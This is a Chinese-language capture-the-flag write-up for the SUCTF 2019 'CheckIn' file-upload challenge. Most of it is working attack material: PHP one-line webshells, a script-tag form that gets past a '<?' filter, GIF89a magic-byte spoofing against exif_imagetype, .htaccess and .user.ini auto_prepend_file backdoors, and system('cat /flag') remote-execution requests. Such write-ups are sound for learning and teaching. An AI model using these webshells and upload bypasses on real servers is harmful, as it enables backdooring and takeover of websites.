[SUCTF 2019]CheckIn 1

[SUCTF 2019]CheckIn 1

知识点：    

.user.ini    .htaccess  //知识点统细讲放到最后，建议学习一下连接里面的内容

文件上传内容检测    

一句话木马

rce命令执行、蚁剑连接

题解：

1.正常的一句话木马

上传含有一句话木马的 jpg、png、gif 图片均回显 <? in contents ：从这里可以看出题目对文件内容做了限制，我们不能使用带<?的一句话木马

<?php @eval($_REQUEST['cmd']);?>   //开始上传图片中写入的一句话木马


<script language="php">eval($_REQUEST['cmd']);</script>     //    用于绕过 <?

还可以在前面加 幻术头绕过   GIF89a（GIF图片的ascii 值）

2.exif_imagetype()函数限制

成功过滤<? ,发现题目还用exif_imagetype() 函数 对上传文件后缀进行了限制。

exif_imagetype()函数会读取图像的第一个字节，并检查其签名，如果发现了恰当的签名则会返回相应的常量，否则返回false ，我们可以在一句话木马前面加上一个GIF图片文件头前缀GIF89a进行绕过，让函数误认为我们是合法的后缀

GIF89a
<script language='php'>eval($_REQUEST['cmd']);</script>

//三种图片的前缀
JPG ：FF D8 FF E0 00 10 4A 46 49 46（16进制编码）
GIF：47 49 46 38 39 61（ascll值是GIF89a）
PNG： 89 50 4E 47

3.user.ini文件

到现在我们就可以上传成功一个图片了，但它一句话木马并不能被后台服务器解析（可以使用PHPinfo验证），所以这里我们应该怎末想？？？？怎末去绕过？？？

在学习文件上传时应该都学过， .htaccess 文件，可以把后缀为其他类型的图片解析成php文件对，使我们上传的图片内容可以被解析，但是这里对 .htaccess文件也做了限制，，，所以我们就需要想其他的办法。

<FilesMatch>
SetHandler application/x-httpd-php
</FilesMatch>

这里我们引入一个php目录配置文件 .user.ini

作用：这里如果我们上传一个.user.ini 文件，那么当我们访问目录中的任何php文件时，都会调用.user.ini中指的文件以php的形式进行读取我
们在user.ini设置文件

//上传.user.ini文件，条件如下：

(1)服务器脚本语言为PHP                     
(2)对应目录下面有可执行的php文件              //index.php
(3)服务器使用CGI／FastCGI模式   


上传的文件内容
GIF89a                         //auto_prepend_file是在文件前插入，而auto_append_file是在文件最后才插入。                  
auto_prepend_file=b.gif       //需要注意上穿的文件名字要和设定的名字一样，这里可以设定多个

成功上传 .user.ini

上传成功b.gif

GIF89a 
<script language='php'>eval($_REQUEST['cmd']);</script>

4.用传进去的cmd 进行rce

然后利用传如shell （cmd参数） ，进行传参

uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?cmd=var_dump(scandir("/")); // 扫描当前目录下的文件，并打印出来

uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?cmd=system('cat /flag');

uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?cmd=var_dump(file_get_contents("/flag"));

或者直接利用蚁剑连接也可以拿到flag

题目涉及知识点详解

一、.user.ini .htaccess 文件

php.ini是php的一个全局配置文件，对整个web服务起作用；而.user.ini和.htaccess一样是目录的配置文件。这里我们可以把.user.ini看作是用户自定义的一个php.ini，并且可以利用这个文件来构造后门和隐藏后门。

.user.ini。它比.htaccess用的更广，不管是nginx/apache/IIS，只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi，我的IIS php5.3以上的全部用的fastcgi/cgi，我win下的apache上也用的fcgi，可谓很广，不像.htaccess有局限性。

举个例子理解user.ini作用：
/*这是.user.ini的两个配置  
auto_prepend_file是在文件前插入
auto_append_file是在文件最后才插入*/

1.在user.ini 中设置
auto_prepend_file=b.gif

2.在b.gif中设置 一句话木马

3.还有个php文件 如：前面做题中的index.php    

如果这三个条件在同一个目录下面，就会出先问题，这里就相当于 在index.php中写了include "b.gif" , 可以进行文件包含，导致的后果是：当我们对目录中的index.php进行访问的时候，会调用.usre.ini 中的文件把b.gif文件以php的形式进行读取，造成userini的漏洞

局限
在.user.ini中使用这条配置也说了是在同目录下的其他.php 文件中包含配置中所指定的文件，也就是说需要该目录下存在.php 文件，通常在文件上传中，一般是专门有一个目录用来存在图片，可能小概率会存在.php 文件。

但是有时可以使用 ../ 来将文件上传到其他目录，达到一个利用的效果。